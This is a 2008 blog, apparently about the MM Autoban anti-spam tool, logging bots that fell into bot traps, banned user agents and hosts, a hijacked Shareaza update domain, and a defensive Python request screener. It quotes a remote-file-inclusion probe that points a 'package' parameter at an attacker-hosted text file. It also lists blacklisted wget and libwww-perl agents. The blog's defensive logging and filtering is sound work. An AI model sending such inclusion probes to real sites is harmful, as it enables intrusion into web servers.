Feb 29, 2008

new bot trap listings

Why are all of these IPs falling into bot traps?
Looks like a botnet that's trying to spider web sites.

2008-02-24,basetower.com,AB,BAN,Fell in bot trap
2008-02-28,hestia.produhost.net,AB,BAN,Fell in bot trap
2008-02-28,riad.pk.edu.pl,AB,BAN,Fell in bot trap
2008-02-28,son.s-online.at,AB,BAN,Fell in bot trap
2008-02-28,i-dreams.net,AB,BAN,Fell in bot trap
2008-02-28,-,AB,BAN,Fell in bot trap
2008-02-28,sd-301.dedibox.fr,AB,BAN,Fell in bot trap
2008-02-29,dman.com,AB,BAN,Fell in bot trap
2008-02-29,infurma.es,AB,BAN,Fell in bot trap
2008-02-29,kkadam.xs4all.nl,AB,BAN,Fell in bot trap
2008-02-29,-,AB,BAN,Fell in bot trap

Feb 28, 2008

"Fake Shareaza" takes over updates from the real thing

Posted by Erica George Wed, 20 Feb 2008 21:06:00 GMT

Users of the popular filesharing application Shareaza are reporting that a competitor has taken over a former Shareaza website and is using it to overwrite the real Shareaza application with an impostor posing as an update.

How is that possible? According to Sarah Pike at AppScout:

Someone took great advantage of old code in Shareaza, which checks for updates with, among other URLs, www.shareaza.com, which another company has now registered. So when the real Shareaza does its regular thing and checks in for updates, it offers to download the fake Shareaza to replace itself.
For software producers, this is an important wake-up call. If your software automatically checks a website for updates, you’re responsible for what that website delivers to your users, so it’s important to maintain control of that site.

Users shouldn’t see the Shareaza switch as a reason to forgo software updates. As the AppScout post discusses, in this kind of social engineering scam there are often warning signs that something may not be quite right. Be sure you read dialog boxes carefully before clicking OK and agreeing to anything, including an update. And do your best to stay informed about the software you use by signing up for alerts from the distributor, or regularly checking for news.


We warned you about this domain being hijacked a while ago. You are also warned that the software installs some bots on your system, so if you do download this impostor you need to scan your system for adware.

Get the real program at its new location

Feb 20, 2008

ns.allwatch.us spambot

400 Prohibited header 'Proxy-Connection' present
Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0; T312461) ns.allwatch.us

No traffic should be coming from this domain. It's a RU watch site, so it's banned.

porting Bad Behavior to any PHP script

If you are having trouble porting Bad Behavior to a PHP script, all you have to do is use the scripts in MM Autoban and the work is done for you. Just install BB under the MM Autoban directory. You don't have to use MM Autoban; you can just call BB.

Feb 19, 2008

More Botnets found

403 User-Agent was found on blacklist
Agent: libwww-perl/5.808 pouch.kangaroopartners.com
Agent: libwww-perl/5.808 mail.zoiig.com
Agent: libwww-perl/5.808 greenlifestyletoday.com
Agent: libwww-perl/5.805 creativestation.co.uk
Agent: libwww-perl/5.808 orbitdesignworks.com
Agent: libwww-perl/5.808 alef.northtrex.com
Agent: libwww-perl/5.79 familyguy.ca
Agent: libwww-perl/5.803 server1.opennms.org
Agent: libwww-perl/5.79 newinst.greenbaumstaging.com
Agent: libwww-perl/5.79 ns3.ctm-it.com
Agent: libwww-perl/5.808 64-141-102-13.static.dns77.com
Agent: libwww-perl/5.805 no-dns-yet.demon.co.uk
Agent: libwww-perl/5.808 72-29-78-145.static.dimenoc.com
Agent: libwww-perl/5.805 s15289207.onlinehome-server.info
Agent: libwww-perl/5.808 drive28.123servers.com
Agent: libwww-perl/5.808
Agent: libwww-perl/5.805 master.herrotto.de

Hacker scripts on amyru.h18.ru

This joker thought I might be using a filename to load a text file, so he tried to load his hacker file. This is not how I program though, so it would do nothing even if his user agent had not been banned.

package=http://amyru.h18.ru/images/cs.txt? GET HTTP/1.1
Agent: wget/1.1 (compatible; i486; linux; redhat7.3)

h18.ru should be added to the hackers file.

The host has shut down amyru.h18.ru
Access you is forbidden cannot obtain access to site amyru.h18.ru of t.k its owner it allowed the crude violation of the conditions of free hosting and was deprived of the right of access. All questions request to direct to hs@agava.com

Feb 14, 2008

MM Autoban

v3.8 has been released. This includes all the bug fixes and some minor fixes.

w32.nopir.c-p2p Virus Removal tool

Since I released this tool back in 06, 118 people have downloaded it to remove this nasty virus. Once you get it, it erases all your music files and then prevents you from booting your system.

Download this program, w32.nopir.c-p2p-worm-fix-v2.zip, on another computer and copy it to your computer. You will likely have to use a CD or a disk. Reboot your computer following the docs and run the script. It will remove the hack files and the hooks that load them. You should then be able to reboot to Windows. This was written for XP; it is unknown how the virus will work on Vista.

Feb 6, 2008

robot sipost.de

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) sipost.de

Not sure what this bot is trying to do. It fell into a bot trap.

A visit to sipost.de tells me access forbidden.

So sipost.de is now banned.

dude.websupport.sk is a robot

Agent: -NO AGENT- dude.websupport.sk

Not sure what this one is. But websupport.sk is now banned.

NASA Web Robot? host.jsc.nasa.gov

403 Required header 'Accept' missing
Agent: Mozilla/4.0 (compatible; MSIE 5.0; Windows NT) host.jsc.nasa.gov

What's this? Is NASA running a robot?


Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) maryland.networkphantom.net

Another bot. Fell into a bot trap and then tried to post some spam URLs after it was banned.

gts2.westmaster.com spambot

Agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.1; .net clr 2.0.50727; .net clr 1.1.4322) gts2.westmaster.com

This bot came in and fell in a bot trap. It then went about trying to post spam URLs after it had been banned.
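
The rejections logged in the posts above (blacklisted User-Agent, prohibited 'Proxy-Connection' header, missing 'Accept' header, and a URL passed as a parameter value) can be written as one request-screening function. This is an added example in Python, not Bad Behavior's or MM Autoban's own code; the blacklist prefixes, the status and wording of the remote-URL rule, and the sample requests are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Assumed blacklist prefixes; the posts show libwww-perl and wget agents being refused.
UA_BLACKLIST = ("libwww-perl/", "wget/")
# A parameter value that is itself a URL, as in the package=http://... request above.
REMOTE_URL = re.compile(r"^(?:https?|ftp)://", re.IGNORECASE)

def screen(request_line, headers):
    """Return (status, reason) for one request; (200, "ok") when no rule fires."""
    h = {name.lower(): value for name, value in headers.items()}
    if h.get("user-agent", "").lower().startswith(UA_BLACKLIST):
        return 403, "User-Agent was found on blacklist"
    if "proxy-connection" in h:
        return 400, "Prohibited header 'Proxy-Connection' present"
    if "accept" not in h:
        return 403, "Required header 'Accept' missing"
    # Inspect the query string of the request target for remote-include probes.
    parts = request_line.split()
    target = parts[1] if len(parts) >= 2 else ""
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        if REMOTE_URL.match(value.strip()):
            # Status and wording for this rule are assumptions, not from the posts.
            return 403, f"Remote URL in parameter '{name}'"
    return 200, "ok"

BROWSER = "Mozilla/5.0 (X11; Linux x86_64)"  # constructed User-Agent
# Constructed requests modelled on the log entries in the posts; paths and hosts are made up.
SAMPLES = [
    ("GET / HTTP/1.1", {"User-Agent": "libwww-perl/5.808", "Accept": "*/*"}),
    ("GET / HTTP/1.1", {"User-Agent": BROWSER, "Accept": "*/*",
                        "Proxy-Connection": "keep-alive"}),
    ("GET / HTTP/1.1", {"User-Agent": BROWSER}),
    ("GET /index.php?package=http://host.example/cs.txt? HTTP/1.1",
     {"User-Agent": "wget/1.1 (compatible; i486; linux; redhat7.3)", "Accept": "*/*"}),
    ("GET /index.php?package=http://host.example/cs.txt? HTTP/1.1",
     {"User-Agent": BROWSER, "Accept": "text/html"}),
    ("GET /index.php?package=news HTTP/1.1",
     {"User-Agent": BROWSER, "Accept": "text/html"}),
]

def run_samples():
    """Screen every constructed sample and return the verdicts in order."""
    return [screen(line, hdrs) for line, hdrs in SAMPLES]

if __name__ == "__main__":
    for (line, _), verdict in zip(SAMPLES, run_samples()):
        print(verdict, line)
```

The wget sample is refused on its User-Agent before the parameter is examined; the same request with a browser User-Agent is caught by the remote-URL rule.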